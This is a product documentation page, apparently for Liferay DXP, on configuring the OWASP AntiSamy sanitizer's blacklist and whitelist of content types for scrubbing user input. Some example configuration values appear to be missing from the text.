The module leverages the powerful OWASP AntiSamy library to enforce a content policy that’s been effective for the auction site eBay. The AntiSamy module adds an OWASP AntiSamy implementation to your portal’s list of existing sanitizer implementations. Liferay DXP uses the AntiSamy sanitizer and any existing configured sanitizers to scrub user input to blogs entries, calendar events, message boards posts, wiki pages, and web content articles.
AntiSamy is enabled by default.
AntiSamy uses both a blacklist and a whitelist, so you can define subsets of entities that should be sanitized or not sanitized. The whitelist prevents content of that type from being filtered, while the blacklist filters content of that type.
By default, everything is sanitized except for
FragmentEntry. The assumption is that users posting these
kinds of content are trusted, while users posting message boards or wiki
articles may not be trusted. If this is not the configuration you want, you can
Navigate to Control Panel → System Settings → Security Tools → AntiSamy Sanitizer.
Enter a package path you want to sanitize into the Blacklist field.
Use the plus (+) button to add further Blacklist fields if you need them.
Use the plus (+) button to add further Whitelist fields if you need them.
Enter a package path you don’t want sanitized into a Whitelist field.
If you want to remove a package path from the configuration, click the trash can icon.
When finished, click Save.
You can use wildcards in the configuration. For example, if you only want to sanitize message board posts and nothing else, you can
Configure the whitelist to
Configure the blacklist to
The whitelist and the blacklist work together. Without the blacklist,
the above configuration’s whitelist must include every content type except
com.liferay.message.boards, which would be a daunting task to configure.
Use AntiSamy to ensure user-generated content stays safe for other users to view.